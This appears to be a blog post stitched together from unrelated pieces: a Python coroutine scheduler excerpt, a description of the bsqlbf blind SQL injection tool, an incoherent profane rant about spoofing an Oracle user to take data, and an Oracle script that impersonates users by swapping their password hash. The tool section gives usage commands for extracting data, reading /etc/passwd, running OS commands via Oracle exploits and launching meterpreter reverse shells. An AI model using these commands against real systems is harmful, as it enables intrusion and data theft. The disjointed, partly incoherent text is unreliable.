Wednesday, October 11, 2017

forget it...I just remember to hunt them down, with a trick

traceback.print_exc


Project: nzbToMedia 
Source File: bluelet.py
# Excerpt of bluelet.py: the event classes (ValueEvent, SpawnEvent, ...),
# Delegated, SUSPENDED, ThreadException and _event_select are defined
# elsewhere in the same module.
import collections
import errno
import socket
import sys
import traceback
import types


def run(root_coro):
    """Schedules a coroutine, running it to completion. This
    encapsulates the Bluelet scheduler, which the root coroutine can
    add to by spawning new coroutines.
    """
    # The "threads" dictionary keeps track of all the currently-
    # executing and suspended coroutines. It maps coroutines to their
    # currently "blocking" event. The event value may be SUSPENDED if
    # the coroutine is waiting on some other condition: namely, a
    # delegated coroutine or a joined coroutine. In this case, the
    # coroutine should *also* appear as a value in one of the below
    # dictionaries `delegators` or `joiners`.
    threads = {root_coro: ValueEvent(None)}
 
    # Maps child coroutines to delegating parents.
    delegators = {}
 
    # Maps child coroutines to joining (exit-waiting) parents.
    joiners = collections.defaultdict(list)
 
    def complete_thread(coro, return_value):
        """Remove a coroutine from the scheduling pool, awaking
        delegators and joiners as necessary and returning the specified
        value to any delegating parent.
        """
        del threads[coro]
 
        # Resume delegator.
        if coro in delegators:
            threads[delegators[coro]] = ValueEvent(return_value)
            del delegators[coro]
 
        # Resume joiners.
        if coro in joiners:
            for parent in joiners[coro]:
                threads[parent] = ValueEvent(None)
            del joiners[coro]
 
    def advance_thread(coro, value, is_exc=False):
        """After an event is fired, run a given coroutine associated with
        it in the threads dict until it yields again. If the coroutine
        exits, then the thread is removed from the pool. If the coroutine
        raises an exception, it is reraised in a ThreadException. If
        is_exc is True, then the value must be an exc_info tuple and the
        exception is thrown into the coroutine.
        """
        try:
            if is_exc:
                next_event = coro.throw(*value)
            else:
                next_event = coro.send(value)
        except StopIteration:
            # Thread is done.
            complete_thread(coro, None)
        except:
            # Thread raised some other exception.
            del threads[coro]
            raise ThreadException(coro, sys.exc_info())
        else:
            if isinstance(next_event, types.GeneratorType):
                # Automatically invoke sub-coroutines. (Shorthand for
                # explicit bluelet.call().)
                next_event = DelegationEvent(next_event)
            threads[coro] = next_event
 
    def kill_thread(coro):
        """Unschedule this thread and its (recursive) delegates.
        """
        # Collect all coroutines in the delegation stack.
        coros = [coro]
        while isinstance(threads[coro], Delegated):
            coro = threads[coro].child
            coros.append(coro)
 
        # Complete each coroutine from the top to the bottom of the
        # stack.
        for coro in reversed(coros):
            complete_thread(coro, None)
 
    # Continue advancing threads until root thread exits.
    exit_te = None
    while threads:
        try:
            # Look for events that can be run immediately. Continue
            # running immediate events until nothing is ready.
            while True:
                have_ready = False
                for coro, event in list(threads.items()):
                    if isinstance(event, SpawnEvent):
                        threads[event.spawned] = ValueEvent(None)  # Spawn.
                        advance_thread(coro, None)
                        have_ready = True
                    elif isinstance(event, ValueEvent):
                        advance_thread(coro, event.value)
                        have_ready = True
                    elif isinstance(event, ExceptionEvent):
                        advance_thread(coro, event.exc_info, True)
                        have_ready = True
                    elif isinstance(event, DelegationEvent):
                        threads[coro] = Delegated(event.spawned)  # Suspend.
                        threads[event.spawned] = ValueEvent(None)  # Spawn.
                        delegators[event.spawned] = coro
                        have_ready = True
                    elif isinstance(event, ReturnEvent):
                        # Thread is done.
                        complete_thread(coro, event.value)
                        have_ready = True
                    elif isinstance(event, JoinEvent):
                        threads[coro] = SUSPENDED  # Suspend.
                        joiners[event.child].append(coro)
                        have_ready = True
                    elif isinstance(event, KillEvent):
                        threads[coro] = ValueEvent(None)
                        kill_thread(event.child)
                        have_ready = True
 
                # Only start the select when nothing else is ready.
                if not have_ready:
                    break
 
            # Wait and fire.
            event2coro = dict((v, k) for k, v in threads.items())
            for event in _event_select(threads.values()):
                # Run the IO operation, but catch socket errors.
                try:
                    value = event.fire()
                except socket.error as exc:
                    if isinstance(exc.args, tuple) and \
                            exc.args[0] == errno.EPIPE:
                        # Broken pipe. Remote host disconnected.
                        pass
                    else:
                        traceback.print_exc()
                    # Abort the coroutine.
                    threads[event2coro[event]] = ReturnEvent(None)
                else:
                    advance_thread(event2coro[event], value)
 
        except ThreadException as te:
            # Exception raised from inside a thread.
            event = ExceptionEvent(te.exc_info)
            if te.coro in delegators:
                # The thread is a delegate. Raise exception in its
                # delegator.
                threads[delegators[te.coro]] = event
                del delegators[te.coro]
            else:
                # The thread is root-level. Raise in client code.
                exit_te = te
                break
 
        except:
            # For instance, KeyboardInterrupt during select(). Raise
            # into root thread and terminate others.
            threads = {root_coro: ExceptionEvent(sys.exc_info())}
 
    # If any threads still remain, kill them.
    for coro in threads:
        coro.close()
 
    # If we're exiting with an exception, raise it in the client.
    if exit_te:
        exit_te.reraise()
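As an added example (not bluelet's own code), a stripped-down scheduler in the same shape as run() above, isolating the part that the ThreadException branch implements: a delegated child's return value comes back to its delegator as a value event, its uncaught exception is thrown back into the delegator, and a failure in the root coroutine surfaces to the caller. The event classes are replaced by constructed tag strings, and the coroutines `child` and `parent` are assumptions made up for the demonstration.

```python
import types

VALUE, EXC = "value", "exc"  # constructed event tags standing in for bluelet's classes


def run(root):
    """Mini scheduler: yielding a generator delegates to it; the child's return value (or uncaught exception) is handed back to the delegating parent."""
    threads = {root: (VALUE, None)}  # runnable coroutine -> pending event
    delegators = {}                  # child coroutine -> parked parent
    result = None
    while threads:
        for coro, (kind, payload) in list(threads.items()):
            try:
                if kind == EXC:
                    nxt = coro.throw(payload)   # re-raise the child's failure here
                else:
                    nxt = coro.send(payload)
            except StopIteration as stop:
                del threads[coro]
                if coro is root:
                    result = stop.value
                elif coro in delegators:
                    threads[delegators.pop(coro)] = (VALUE, stop.value)
            except Exception as exc:
                del threads[coro]
                if coro not in delegators:
                    raise                        # root-level failure: surface to caller
                threads[delegators.pop(coro)] = (EXC, exc)
            else:
                if isinstance(nxt, types.GeneratorType):
                    del threads[coro]            # park parent until the child finishes
                    threads[nxt] = (VALUE, None)
                    delegators[nxt] = coro
                else:
                    threads[coro] = (VALUE, nxt)
    return result


def child(fail):
    yield "step"
    if fail:
        raise ValueError("boom")
    return "child done"


def parent():
    first = yield child(False)       # resumed with the child's return value
    try:
        yield child(True)
    except ValueError as exc:        # the child's exception lands here
        second = "caught " + str(exc)
    return first, second
```

Running `run(parent())` returns `("child done", "caught boom")`; a root coroutine that raises without a delegator propagates its exception out of `run()`, which is where the traceback.print_exc() trick from the top of the post earns its keep.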

Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer

There are plenty of automated Blind SQL Injection tools available. Here I am introducing one of them, named bsqlbf (expanded as Blind SQL Injection Brute Forcer).
This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter, and it works for both integer- and string-based injections.
Supported Database:
  • MS-SQL
  • MySQL
  • PostgreSQL
  • Oracle
The tool supports 8 attack modes (-type switch):
Type 0: Blind SQL Injection based on true and false conditions returned by the back-end server
Type 1: Blind SQL Injection based on true and error (e.g. syntax error) conditions returned by the back-end server.
Type 2: Blind SQL Injection in “order by” and “group by”.
Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)
Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)
Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit
Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs
-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first
Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first
For Type 4 (O.S. code execution) the following methods are supported (-stype switch, which selects how the command is executed):
SType 0 (default) is based on Java; it will NOT work against Oracle XE.
SType 1 is against Oracle 9 with plsql_native_make_utility.
SType 2 is against Oracle 10 with dbms_scheduler.


CODE FOR SQL INJECTION WITH WHITEHAT DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC


Blind Sql Injection Brute Forcer version 2
This is a modified version of 'bsqlbfv1.2-th.pl'. This Perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter, and it works for both integer- and string-based injections. Databases supported:
0. MS-SQL
1. MySQL
2. PostgreSQL
3. Oracle

Usage example:
$./bsqlbf-v2.pl -url http://192.168.1.1/injection_string_post/1.asp?p=1 -method post -match true -database 0 -sql "select top 1 name from sysobjects where xtype='U'"
./bsqlbf-v2.3.pl -url http://192.168.1.1/injection_string_post/1.jsp?p=1 -type 4 -match "true" -cmd "ping notsosecure.com"

User Interface:
ubuntu@ubuntu:~$ ./bsqlbf-v2-3.pl

// Blind SQL injection brute forcer \\
//originally written by...aramosf@514.es  \\
// mofified by sid-at-notsosecure.com \\
// http://www.notsosecure.com \\

---------------------usage:-------------------------------------------
Integer based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=1000 (options)
String Based Injection-->./bsqlbf-v2-3.pl - url http://www.host.com/path/script.php?foo=bar' (options)

------------------------------------options:--------------------------
-sql:          valid SQL syntax to get; version(), database(),
               (select  table_name from inforamtion_schema.tables limit 1 offset 0)
-get:          If MySQL user is root, supply word readable file name
-blind:        parameter to inject sql. Default is last value of url
-match:        *RECOMMENDED* string to match in valid query, Default is auto
-start:        if you know the beginning of the string, use it.
-length:       maximum length of value. Default is 32.
-time:         timer options:
        0:      dont wait. Default option.
        1:      wait 15 seconds
        2:      wait 5 minutes
-type:         Type of injection:
        0:      Type 0 (default) is blind injection based on True and False responses
        1:      Type 1 is blind injection based on True and Error responses
        2:      Type 2 is injection in order by and group by
        3:      Type 3 !!New!! is extracting data with SYS privileges (ORACLE dbms_export_extension exploit)
        4:      Type 4 !!New!! is O.S code execution (ORACLE dbms_export_extension exploit)
        5:      Type 5 !!New!! is reading files (ORACLE dbms_export_extension exploit, based on java)
-file:         File to read (default C:\boot.ini)
-stype:        How you want to execute command:
        0:      SType 0 (default) is based on java..will NOT work against XE
        1:      SType 1 is against oracle 9 with plsql_native_make_utility
        2:      SType 2 is against oracle 10 with dbms_scheduler
-database:     Backend database:
        0:      MS-SQL (Default)
        1:      MYSQL
        2:      POSTGRES
        3:      ORACLE
-rtime:        wait random seconds, for example: "10-20".
-method:       http method to use; get or post. Default is GET.
-cmd:          command to execute(type 4 only). Default is "ping 127.0.0.1."
-uagent:       http UserAgent header to use. Default is bsqlbf 2.3
-ruagent:      file with random http UserAgent header to use.
-cookie:       http cookie header to use
-rproxy:       use random http proxy from file list.
-proxy:        use proxy http. Syntax -proxy=http://proxy:port/
-proxy_user:   proxy http user
-proxy_pass:   proxy http password

---------------------------- examples:-------------------------------
bash# ./bsqlbf-v2-3.pl -url http://www.somehost.com/blah.php?u=5 -blind u -sql "select table_name from imformation_schema.tables limit 1 offset 0" -database 1 -type 1
bash# ./bsqlbf-v2-3.pl -url http://www.buggy.com/bug.php?r=514&p=foo' -method post -get "/etc/passwd" -match "foo"

Ok, boolean tribe..the whores feel very much protected still by Oracle. So, let me be a bitch and not an intellectual! Let me dig this 1st aspect " the actual username can be spoofed by use of BECOME USER. This leads to the fact that some spoofing can be done before the session" I want to transfer data from the piece of shit, not exactly on a MIM's. So I do get in, as BECOME USER? Let me start being a bitch! over with brains Olympic games NSA!

How to become another User in SQLPlus

See this link for a much better way to achieve this in current releases, using proxy users...
A DBA frequently needs to become another user to test something or verify a problem.  Short of having to gain access to that user's password, we are asked: can I su to that account, sort of like root does on unix.
This is an 'su.sql' script I use:
 

whenever sqlerror exit
column password new_value pw
declare
    l_passwd varchar2(45);
begin
    select password into l_passwd
      from sys.dba_users
     where username = upper('&1');
end;
/

select password
  from sys.dba_users
 where username = upper( '&1' )
/

alter user &1 identified by Hello;
connect &1/hello
alter user &1 identified by values '&pw';
show user
whenever sqlerror continue

It starts by testing your access to the sys.dba_users table -- if that fails -- it exits SQLPlus.  If zero rows are returned -- it exits SQLPlus.

It then selects the 'password' from the dba_users table and stuffs it into a macro variable "&pw".
We alter the user you want to become to have a known password (if that fails, we exit).
We 'fix' their password back after logging in as them....
Note, you need to have access to dba_users and the alter user privilege.


https://asktom.oracle.com/Misc/su.html
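The proxy-user route that the AskTom note points to ("a much better way ... using proxy users"), as an added example that is not part of the quoted su.sql script: the session runs as the target user without the DBA ever reading or rewriting that user's password hash, and the proxy relationship is visible in the catalog and in the session context for auditing. The DBA account dba_ops, its password and the target user scott are assumptions.

```sql
-- As a DBA: allow dba_ops to open sessions on behalf of scott. No
-- ALTER USER ... IDENTIFIED BY, so scott's password hash is never touched.
ALTER USER scott GRANT CONNECT THROUGH dba_ops;

-- SQL*Plus: connect as scott through the proxy. The credential presented
-- is dba_ops's own; the resulting session is SCOTT's.
CONNECT dba_ops[scott]/dba_ops_password

SHOW USER                                       -- USER is "SCOTT"

-- Inside the session, the proxying account stays identifiable.
SELECT SYS_CONTEXT('USERENV', 'PROXY_USER') AS proxy_user,
       SYS_CONTEXT('USERENV', 'SESSION_USER') AS session_user
  FROM dual;                                    -- DBA_OPS / SCOTT

-- Catalog check: which proxies may connect as which clients.
SELECT proxy, client FROM dba_proxies WHERE client = 'SCOTT';

-- Remove the relationship when the work is done.
ALTER USER scott REVOKE CONNECT THROUGH dba_ops;
```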
